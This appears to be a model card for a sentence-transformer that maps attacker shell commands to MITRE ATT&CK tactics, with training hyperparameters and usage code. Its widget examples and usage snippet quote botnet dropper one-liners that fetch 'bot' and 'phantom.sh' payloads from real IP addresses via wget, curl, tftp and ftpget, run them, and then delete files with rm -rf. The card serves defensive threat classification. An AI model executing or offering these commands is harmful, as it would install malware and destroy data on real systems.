metadata
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- generated_from_trainer
- dataset_size:212
- loss:CosineSimilarityLoss
base_model: sentence-transformers/all-mpnet-base-v2
widget:
- source_sentence: sh; enable; system; shell; /bin/busybox
sentences:
- >-
Defense Evasion: The adversary is trying to avoid being detected.
Defense Evasion consists of techniques that adversaries use to avoid
detection throughout their compromise. Techniques used for defense
evasion include uninstalling/disabling security software or
obfuscating/encrypting data and scripts. Adversaries also leverage and
abuse trusted processes to hide and masquerade their malware. Other
tactics’ techniques are cross-listed here when those techniques include
the added benefit of subverting defenses.
- >-
Defense Evasion: The adversary is trying to avoid being detected.
Defense Evasion consists of techniques that adversaries use to avoid
detection throughout their compromise. Techniques used for defense
evasion include uninstalling/disabling security software or
obfuscating/encrypting data and scripts. Adversaries also leverage and
abuse trusted processes to hide and masquerade their malware. Other
tactics’ techniques are cross-listed here when those techniques include
the added benefit of subverting defenses.
- >-
Lateral Movement: The adversary is trying to move through your
environment.
Lateral Movement consists of techniques that adversaries use to enter
and control remote systems on a network. Following through on their
primary objective often requires exploring the network to find their
target and subsequently gaining access to it. Reaching their objective
often involves pivoting through multiple systems and accounts to gain.
Adversaries might install their own remote access tools to accomplish
Lateral Movement or use legitimate credentials with native network and
operating system tools, which may be stealthier.
- source_sentence: enable; ; system; ; shell; ; SH; ; /bin/busybox
sentences:
- >-
Persistence: The adversary is trying to maintain their foothold.
Persistence consists of techniques that adversaries use to keep access
to systems across restarts, changed credentials, and other interruptions
that could cut off their access. Techniques used for persistence include
any access, action, or configuration changes that let them maintain
their foothold on systems, such as replacing or hijacking legitimate
code or adding startup code.
- >-
Privilege Escalation: The adversary is trying to gain higher-level
permissions.
Privilege Escalation consists of techniques that adversaries use to gain
higher-level permissions on a system or network. Adversaries can often
enter and explore a network with unprivileged access but require
elevated permissions to follow through on their objectives. Common
approaches are to take advantage of system weaknesses,
misconfigurations, and vulnerabilities. Examples of elevated access
include:
* SYSTEM/root level
* local administrator
* user account with admin-like access
* user accounts with access to specific system or perform specific
function
These techniques often overlap with Persistence techniques, as OS
features that let an adversary persist can execute in an elevated
context.
- >-
Defense Evasion: The adversary is trying to avoid being detected.
Defense Evasion consists of techniques that adversaries use to avoid
detection throughout their compromise. Techniques used for defense
evasion include uninstalling/disabling security software or
obfuscating/encrypting data and scripts. Adversaries also leverage and
abuse trusted processes to hide and masquerade their malware. Other
tactics’ techniques are cross-listed here when those techniques include
the added benefit of subverting defenses.
- source_sentence: zlxx; enable; ; system; ; shell; ; sh; ; /bin/busybox
sentences:
- >-
Defense Evasion: The adversary is trying to avoid being detected.
Defense Evasion consists of techniques that adversaries use to avoid
detection throughout their compromise. Techniques used for defense
evasion include uninstalling/disabling security software or
obfuscating/encrypting data and scripts. Adversaries also leverage and
abuse trusted processes to hide and masquerade their malware. Other
tactics’ techniques are cross-listed here when those techniques include
the added benefit of subverting defenses.
- >-
Execution: The adversary is trying to run malicious code.
Execution consists of techniques that result in adversary-controlled
code running on a local or remote system. Techniques that run malicious
code are often paired with techniques from all other tactics to achieve
broader goals, like exploring a network or stealing data. For example,
an adversary might use a remote access tool to run a PowerShell script
that does Remote System Discovery.
- >-
Persistence: The adversary is trying to maintain their foothold.
Persistence consists of techniques that adversaries use to keep access
to systems across restarts, changed credentials, and other interruptions
that could cut off their access. Techniques used for persistence include
any access, action, or configuration changes that let them maintain
their foothold on systems, such as replacing or hijacking legitimate
code or adding startup code.
- source_sentence: >-
cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget
http://89.110.99.68/bot; chmod 777 *; ./bot; cd /tmp; cd /var/run; cd
/mnt; cd /root; cd /; wget http://89.110.99.68/bot; chmod 777 *; ./bot
sentences:
- >-
Resource Development: The adversary is trying to establish resources
they can use to support operations.
Resource Development consists of techniques that involve adversaries
creating, purchasing, or compromising/stealing resources that can be
used to support targeting. Such resources include infrastructure,
accounts, or capabilities. These resources can be leveraged by the
adversary to aid in other phases of the adversary lifecycle, such as
using purchased domains to support Command and Control, email accounts
for phishing as a part of Initial Access, or stealing code signing
certificates to help with Defense Evasion.
- >-
Privilege Escalation: The adversary is trying to gain higher-level
permissions.
Privilege Escalation consists of techniques that adversaries use to gain
higher-level permissions on a system or network. Adversaries can often
enter and explore a network with unprivileged access but require
elevated permissions to follow through on their objectives. Common
approaches are to take advantage of system weaknesses,
misconfigurations, and vulnerabilities. Examples of elevated access
include:
* SYSTEM/root level
* local administrator
* user account with admin-like access
* user accounts with access to specific system or perform specific
function
These techniques often overlap with Persistence techniques, as OS
features that let an adversary persist can execute in an elevated
context.
- >-
Execution: The adversary is trying to run malicious code.
Execution consists of techniques that result in adversary-controlled
code running on a local or remote system. Techniques that run malicious
code are often paired with techniques from all other tactics to achieve
broader goals, like exploring a network or stealing data. For example,
an adversary might use a remote access tool to run a PowerShell script
that does Remote System Discovery.
- source_sentence: >-
cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget
http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh;
chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh
phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh
phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp
74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226;
ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh
phantom1.sh
sentences:
- >-
Reconnaissance: The adversary is trying to gather information they can
use to plan future operations.
Reconnaissance consists of techniques that involve adversaries actively
or passively gathering information that can be used to support
targeting. Such information may include details of the victim
organization, infrastructure, or staff/personnel. This information can
be leveraged by the adversary to aid in other phases of the adversary
lifecycle, such as using gathered information to plan and execute
Initial Access, to scope and prioritize post-compromise objectives, or
to drive and lead further Reconnaissance efforts.
- >-
Reconnaissance: The adversary is trying to gather information they can
use to plan future operations.
Reconnaissance consists of techniques that involve adversaries actively
or passively gathering information that can be used to support
targeting. Such information may include details of the victim
organization, infrastructure, or staff/personnel. This information can
be leveraged by the adversary to aid in other phases of the adversary
lifecycle, such as using gathered information to plan and execute
Initial Access, to scope and prioritize post-compromise objectives, or
to drive and lead further Reconnaissance efforts.
- >-
Privilege Escalation: The adversary is trying to gain higher-level
permissions.
Privilege Escalation consists of techniques that adversaries use to gain
higher-level permissions on a system or network. Adversaries can often
enter and explore a network with unprivileged access but require
elevated permissions to follow through on their objectives. Common
approaches are to take advantage of system weaknesses,
misconfigurations, and vulnerabilities. Examples of elevated access
include:
* SYSTEM/root level
* local administrator
* user account with admin-like access
* user accounts with access to specific system or perform specific
function
These techniques often overlap with Persistence techniques, as OS
features that let an adversary persist can execute in an elevated
context.
pipeline_tag: sentence-similarity
library_name: sentence-transformers
SentenceTransformer based on sentence-transformers/all-mpnet-base-v2
This is a sentence-transformers model finetuned from sentence-transformers/all-mpnet-base-v2. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
Model Details
Model Description
- Model Type: Sentence Transformer
- Base model: sentence-transformers/all-mpnet-base-v2
- Maximum Sequence Length: 384 tokens
- Output Dimensionality: 768 dimensions
- Similarity Function: Cosine Similarity
Model Sources
- Documentation: Sentence Transformers Documentation
- Repository: Sentence Transformers on GitHub
- Hugging Face: Sentence Transformers on Hugging Face
Full Model Architecture
SentenceTransformer(
(0): Transformer({'max_seq_length': 384, 'do_lower_case': False}) with Transformer model: MPNetModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
(2): Normalize()
)
Usage
Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("cebollet/fine-tuned-mitre-model")
# Run inference
sentences = [
'cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp 74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226; ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh phantom1.sh',
'Reconnaissance: The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.',
'Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. ',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
Training Details
Training Dataset
Unnamed Dataset
- Size: 212 training samples
- Columns:
sentence_0,sentence_1, andlabel - Approximate statistics based on the first 212 samples:
sentence_0 sentence_1 label type string string float details - min: 4 tokens
- mean: 65.7 tokens
- max: 384 tokens
- min: 82 tokens
- mean: 103.74 tokens
- max: 153 tokens
- min: 0.0
- mean: 0.5
- max: 1.0
- Samples:
sentence_0 sentence_1 label sh; enable; klv1234; system; shell; echo "string"Initial Access: The adversary is trying to get into your network.
Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.0.0sh; ping; sh; enable; system; shell; linuxshell; /bin/busyboxLateral Movement: The adversary is trying to move through your environment.
Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.0.0enable; ; linuxshell; ; system; ; sh; ; /bin/busyboxPrivilege Escalation: The adversary is trying to gain higher-level permissions.
Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:
* SYSTEM/root level
* local administrator
* user account with admin-like access
* user accounts with access to specific system or perform specific function
These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.1.0 - Loss:
CosineSimilarityLosswith these parameters:{ "loss_fct": "torch.nn.modules.loss.MSELoss" }
Training Hyperparameters
Non-Default Hyperparameters
per_device_train_batch_size: 4per_device_eval_batch_size: 4num_train_epochs: 10multi_dataset_batch_sampler: round_robin
All Hyperparameters
Click to expand
overwrite_output_dir: Falsedo_predict: Falseeval_strategy: noprediction_loss_only: Trueper_device_train_batch_size: 4per_device_eval_batch_size: 4per_gpu_train_batch_size: Noneper_gpu_eval_batch_size: Nonegradient_accumulation_steps: 1eval_accumulation_steps: Nonetorch_empty_cache_steps: Nonelearning_rate: 5e-05weight_decay: 0.0adam_beta1: 0.9adam_beta2: 0.999adam_epsilon: 1e-08max_grad_norm: 1num_train_epochs: 10max_steps: -1lr_scheduler_type: linearlr_scheduler_kwargs: {}warmup_ratio: 0.0warmup_steps: 0log_level: passivelog_level_replica: warninglog_on_each_node: Truelogging_nan_inf_filter: Truesave_safetensors: Truesave_on_each_node: Falsesave_only_model: Falserestore_callback_states_from_checkpoint: Falseno_cuda: Falseuse_cpu: Falseuse_mps_device: Falseseed: 42data_seed: Nonejit_mode_eval: Falseuse_ipex: Falsebf16: Falsefp16: Falsefp16_opt_level: O1half_precision_backend: autobf16_full_eval: Falsefp16_full_eval: Falsetf32: Nonelocal_rank: 0ddp_backend: Nonetpu_num_cores: Nonetpu_metrics_debug: Falsedebug: []dataloader_drop_last: Falsedataloader_num_workers: 0dataloader_prefetch_factor: Nonepast_index: -1disable_tqdm: Falseremove_unused_columns: Truelabel_names: Noneload_best_model_at_end: Falseignore_data_skip: Falsefsdp: []fsdp_min_num_params: 0fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap: Noneaccelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed: Nonelabel_smoothing_factor: 0.0optim: adamw_torchoptim_args: Noneadafactor: Falsegroup_by_length: Falselength_column_name: lengthddp_find_unused_parameters: Noneddp_bucket_cap_mb: Noneddp_broadcast_buffers: Falsedataloader_pin_memory: Truedataloader_persistent_workers: Falseskip_memory_metrics: Trueuse_legacy_prediction_loop: Falsepush_to_hub: Falseresume_from_checkpoint: Nonehub_model_id: Nonehub_strategy: every_savehub_private_repo: Nonehub_always_push: Falsegradient_checkpointing: Falsegradient_checkpointing_kwargs: Noneinclude_inputs_for_metrics: Falseinclude_for_metrics: []eval_do_concat_batches: Truefp16_backend: autopush_to_hub_model_id: Nonepush_to_hub_organization: Nonemp_parameters:auto_find_batch_size: Falsefull_determinism: Falsetorchdynamo: Noneray_scope: lastddp_timeout: 1800torch_compile: Falsetorch_compile_backend: Nonetorch_compile_mode: Noneinclude_tokens_per_second: Falseinclude_num_input_tokens_seen: Falseneftune_noise_alpha: Noneoptim_target_modules: Nonebatch_eval_metrics: Falseeval_on_start: Falseuse_liger_kernel: Falseeval_use_gather_object: Falseaverage_tokens_across_devices: Falseprompts: Nonebatch_sampler: batch_samplermulti_dataset_batch_sampler: round_robin
Training Logs
| Epoch | Step | Training Loss |
|---|---|---|
| 9.4340 | 500 | 0.0526 |
Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 2.14.4
- Tokenizers: 0.21.1
Citation
BibTeX
Sentence Transformers
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}